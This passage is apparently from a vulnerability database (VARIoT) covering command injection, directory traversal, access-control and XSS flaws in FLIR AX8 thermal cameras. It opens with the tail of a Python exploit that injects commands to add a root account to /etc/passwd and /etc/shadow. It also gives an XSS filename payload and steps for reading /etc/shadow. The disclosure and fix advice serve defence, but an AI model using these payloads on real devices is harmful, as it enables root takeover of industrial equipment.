\u0027\\\\x39\\\\x31\\\\x34\\\\x3a\\\\x30\\\\x3a\\\\x39\u0027\n                         \u0027\\\\x39\\\\x39\\\\x39\\\\x39\\\\x3a\\\\x37\\\\x3a\u0027\n                         \u0027\\\\x3a\\\\x3a\\\\x0a\\\\x0d\u0027)\n\n            nuPadata1 = {\u0027palette\u0027 : \u00271;echo \\\"roOt:x:0:0:pwn:/sys:/bin/bash\\\" \u003e\u003e /etc/passwd\u0027}\n            nuPadata2 = {\u0027palette\u0027 : \u00271;echo -n -e \\\"\u0027+nuHexstrn+\u0027\\\" \u003e\u003e /etc/shadow\u0027}\n\n            requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)\n            time.sleep(2)\n            requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)\n            \n            print \u0027[*] Success!\\n\u0027\n        else: pass\n\n    except Exception:\n        print \u0027[*] Error!\u0027\n        break\n\nsys.exit()\n. # FLIR AX8 vulnerabilities. \n\n### Product description:\n\nThe FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment. \n\n* [CVE-2022-37060] - Unauthenticated Directory Traversal. \n\nFLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server\u0027s restricted path. \n\n* [CVE-2022-37062] - Improper Access Control. \n\nFLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it. \n\n* [CVE-2022-37063] - Reflected cross-site scripting. \n\nFLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. \n\n###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:\n\n1. \n\nThe endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. \n\nThe server returns a JSON response containing the contents of the `/etc/shadow` file. \n\n2. Unauthenticated Directory Traversal. \n\nThe endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file. \n\nThe error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight. \n\n3. Improper Access Control. \n\nThe endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database. \n\n4. Reflected cross-site scripting. \n\nIn the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call \n\n\u003cimg src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));\u003e.run\n\n\n### Recommendations for how to fix the 4 vulnerabilities:\n\n* Vulnerability 1: The variable `$_POST[\"id\"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. \n\nMore info: \nhttps://www.php.net/intval\nhttps://www.php.net/manual/en/function.escapeshellcmd\nhttps://www.php.net/manual/en/function.escapeshellarg\n\n\n* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions. \n\nMore info:\nhttps://www.php.net/manual/en/function.pathinfo\n\n* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. \n\nMore info:\nhttps://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html\n\n* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. \n\nMore info: \nhttps://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n\n### Reference:\nhttps://www.flir.com/products/ax8-automation/\n\n### Security researchers:\n* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)\n* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi) \n\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-37061"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          },
          {
            "db": "ZSL",
            "id": "ZSL-2018-5491"
          },
          {
            "db": "PACKETSTORM",
            "id": "149789"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          }
        ],
        "trust": 1.89
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.zeroscience.mk/codes/flir_ax8_root.txt",
            "trust": 0.1,
            "type": "poc"
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5491"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-37061",
            "trust": 3.3
          },
          {
            "db": "ZSL",
            "id": "ZSL-2018-5491",
            "trust": 2.6
          },
          {
            "db": "PACKETSTORM",
            "id": "168116",
            "trust": 2.5
          },
          {
            "db": "PACKETSTORM",
            "id": "169701",
            "trust": 2.4
          },
          {
            "db": "PACKETSTORM",
            "id": "168114",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014925",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2022080059",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3378",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "149789",
            "trust": 0.2
          },
          {
            "db": "EXPLOIT-DB",
            "id": "45602",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5491"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          },
          {
            "db": "PACKETSTORM",
            "id": "149789"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37061"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3378"
          }
        ]
      },
      "id": "VAR-202208-1439",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2023-12-18T11:55:45.672000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37061"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.0,
            "url": "http://packetstormsecurity.com/files/168116/flir-ax8-1.46.16-traversal-access-control-command-injection-xss.html"
          },
          {
            "trust": 3.0,
            "url": "http://packetstormsecurity.com/files/169701/flir-ax8-1.46.16-remote-command-injection.html"
          },
          {
            "trust": 2.5,
            "url": "https://www.flir.com/products/ax8-automation/"
          },
          {
            "trust": 2.5,
            "url": "https://www.zeroscience.mk/en/vulnerabilities/zsl-2018-5491.php"
          },
          {
            "trust": 2.4,
            "url": "http://packetstormsecurity.com/files/168114/flix-ax8-1.46.16-remote-command-execution.html"
          },
          {
            "trust": 2.4,
            "url": "https://gist.github.com/nwqda/9e16852ab7827dc62b8e44d6180a6899"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37061"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-37061/"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2022080059"
          },
          {
            "trust": 0.1,
            "url": "https://www.flir.com/security/best-practices-for-cybersecurity/"
          },
          {
            "trust": 0.1,
            "url": "https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf"
          },
          {
            "trust": 0.1,
            "url": "https://www.flir.com/globalassets/security/cybersecurity-bulletin-10-12-18.pdf"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/45602/"
          },
          {
            "trust": 0.1,
            "url": "https://packetstormsecurity.com/files/149789"
          },
          {
            "trust": 0.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/151286"
          },
          {
            "trust": 0.1,
            "url": "http://vfocus.net/art/20181016/14873.html"
          },
          {
            "trust": 0.1,
            "url": "https://fortiguard.com/encyclopedia/ips/47031"
          },
          {
            "trust": 0.1,
            "url": "http://\u0027+sys.argv[1]+\u0027/res.php\u0027"
          },
          {
            "trust": 0.1,
            "url": "http://\u0027+sys.argv[1]+\u0027/palette.php\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://www.flir.com"
          },
          {
            "trust": 0.1,
            "url": "https://cheatsheetseries.owasp.org/cheatsheets/cross_site_scripting_prevention_cheat_sheet.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/intval"
          },
          {
            "trust": 0.1,
            "url": "https://www.linkedin.com/in/thomasjknudsen)"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37062"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.pathinfo"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.escapeshellcmd"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37060"
          },
          {
            "trust": 0.1,
            "url": "https://www.linkedin.com/in/samy-younsi)"
          },
          {
            "trust": 0.1,
            "url": "https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.escapeshellarg"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37063"
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5491"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          },
          {
            "db": "PACKETSTORM",
            "id": "149789"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37061"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3378"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5491"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          },
          {
            "db": "PACKETSTORM",
            "id": "149789"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37061"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3378"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-10-14T00:00:00",
            "db": "ZSL",
            "id": "ZSL-2018-5491"
          },
          {
            "date": "2023-09-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          },
          {
            "date": "2018-10-15T16:42:47",
            "db": "PACKETSTORM",
            "id": "149789"
          },
          {
            "date": "2022-08-19T19:24:22",
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "date": "2022-08-18T18:15:08.317000",
            "db": "NVD",
            "id": "CVE-2022-37061"
          },
          {
            "date": "2022-08-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-3378"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-11-20T00:00:00",
            "db": "ZSL",
            "id": "ZSL-2018-5491"
          },
          {
            "date": "2023-09-22T08:25:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          },
          {
            "date": "2022-12-09T15:32:37.407000",
            "db": "NVD",
            "id": "CVE-2022-37061"
          },
          {
            "date": "2022-11-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-3378"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "149789"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3378"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FLIR\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0flir\u00a0ax8\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3378"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202208-1438

    Vulnerability from variot - Updated: 2023-12-18 11:55

    FLIR AX8 thermal sensor cameras version up to and including 1.46.16 is vulnerable to Directory Traversal due to an improper access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains directory traversal characters to disclose the contents of files located outside of the server's restricted path. FLIR Systems, Inc. of flir ax8 A path traversal vulnerability exists in firmware.Information may be obtained. The AX8 helps you guard against unplanned outages, service interruptions, and equipment failure.

    The FLIR AX series camera/sensor also has built-in support to connect to industrial control equipment such as programmable logic controllers (PLCs), and allows the sharing of analysis and alarm results and simple control using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy to install, the AX8 provides continuous monitoring of electrical cabinets, process and manufacturing areas, data centers, energy generation and distribution, transportation and mass transit, storage facilities and refrigeration warehouses.The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary file disclosure vulnerability. This can beexploited to disclose the contents of arbitrary files via absolute path.Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)lighttpd/1.4.33PHP/5.4.14. # FLIR AX8 vulnerabilities.

    Product description:

    The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

    Summary of the 4 vulnerabilities found / What we were able to find:

    • [CVE-2022-37061] - Unauthenticated OS Command Injection.

    FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.

    • [CVE-2022-37060] - Unauthenticated Directory Traversal.

    • [CVE-2022-37062] - Improper Access Control. A successful exploit could allow the attacker to extract usernames and hashed passwords.

    • [CVE-2022-37063] - Reflected cross-site scripting.

    FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code.

    Step by Step Example (How to Reproduce and verify) the vulnerabilities:

    1. Unauthenticated Remote Command Injection.

    The endpoint /res.php can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the /etc/shadow file.

    The server returns a JSON response containing the contents of the /etc/shadow file. This command injection is due because there no sanitization check on the variable $_POST["id"], line 65, and can therefore take advantage of the shell_exec() function to execute unexpected arbitrary shell commands.

    1. Unauthenticated Directory Traversal.

    The endpoint /download.php can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate. The second problem is that the GET parameter file can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the /etc/passwd file.

    The error is due to the fact that there is no sanitization of the $file_path variable, line 26, when the fopen() function is called, line 39. However a comment in the code, line 24, and the use of the function pathinfo(), line 28, suggests that the developer thought about this problem and therefore created the variable $path_parts which is sanitized. But for some reasons the developer does not use the sanitizer variable $path_parts when the function fopen() is used. Probably an oversight.

    1. Improper Access Control.

    The endpoint /FLIR/db/users.db can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate and let any malicious actor to download the users.db SQLite database.

    1. Reflected cross-site scripting.

    In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call

    .run

    Recommendations for how to fix the 4 vulnerabilities:

    • Vulnerability 1: The variable $_POST["id"], line 65 in the file /FLIR/usr/www/res.php, must be sanitized using the function intval() and will remove any character other than integer value. escapeshellcmd() and escapeshellarg() must be also used to escapes any characters in a string that might be used to execute arbitrary commands.

    More info: https://www.php.net/intval https://www.php.net/manual/en/function.escapeshellcmd https://www.php.net/manual/en/function.escapeshellarg

    • Vulnerability 2: The variable $file_path, line 39 in the file /FLIR/usr/www/download.php, must be sanitized using the function pathinfo() but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

    More info: https://www.php.net/manual/en/function.pathinfo

    • Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in /etc/lighttpd.conf.

    More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

    • Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

    More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

    Reference:

    https://www.flir.com/products/ax8-automation/

    Security researchers:

    • [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)
    • [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202208-1438",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ax8",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "flir",
            "version": "1.46.16"
          },
          {
            "model": "ax8",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "ax8",
            "scope": null,
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "ax8",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "flir",
            "version": "flir ax8  firmware  1.46.16  and earlier"
          },
          {
            "model": "systems flir ax8 thermal camera",
            "scope": "eq",
            "trust": 0.1,
            "vendor": "flir",
            "version": "1.17.13"
          },
          {
            "model": "systems flir ax8 thermal camera",
            "scope": "eq",
            "trust": 0.1,
            "vendor": "flir",
            "version": "os: neco_v1.8-0-g7ffe5b3"
          },
          {
            "model": "systems flir ax8 thermal camera",
            "scope": "eq",
            "trust": 0.1,
            "vendor": "flir",
            "version": "hardware: flir systems neco board"
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5493"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37060"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.46.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-37060"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Samy Younsi",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3364"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2022-37060",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-37060",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-37060",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202208-3364",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "ZSL",
                "id": "ZSL-2018-5493",
                "trust": 0.1,
                "value": "(4/5)"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5493"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37060"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3364"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FLIR AX8 thermal sensor cameras version up to and including 1.46.16 is vulnerable to Directory Traversal due to an improper access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains directory traversal characters to disclose the contents of files located outside of the server\u0027s restricted path. FLIR Systems, Inc. of flir ax8 A path traversal vulnerability exists in firmware.Information may be obtained. The AX8 helps you guard against unplanned outages, service interruptions, and equipment failure.\u003cbr/\u003e\u003cbr/\u003e The FLIR AX series camera/sensor also has built-in support to connect to industrial control equipment such as programmable logic controllers (PLCs), and allows the sharing of analysis and alarm results and simple control using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy to install, the AX8 provides continuous monitoring of electrical cabinets, process and manufacturing areas, data centers, energy generation and distribution, transportation and mass transit, storage facilities and refrigeration warehouses.The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary file disclosure vulnerability. This can beexploited to disclose the contents of arbitrary files via absolute path.Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)lighttpd/1.4.33PHP/5.4.14. # FLIR AX8 vulnerabilities. \n\n### Product description:\n\nThe FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment. \n\n\n### Summary of the 4 vulnerabilities found / What we were able to find:\n\n* [CVE-2022-37061] - Unauthenticated OS Command Injection. \n\nFLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. \n\n* [CVE-2022-37060] - Unauthenticated Directory Traversal. \n\n* [CVE-2022-37062] - Improper Access Control.  A successful exploit could allow the attacker to extract usernames and hashed passwords. \n\n* [CVE-2022-37063] - Reflected cross-site scripting. \n\nFLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. \n\n###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:\n\n1. Unauthenticated Remote Command Injection. \n\nThe endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. \n\nThe server returns a JSON response containing the contents of the `/etc/shadow` file.  This command injection is due because there no sanitization check on the variable `$_POST[\"id\"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands. \n\n2. Unauthenticated Directory Traversal. 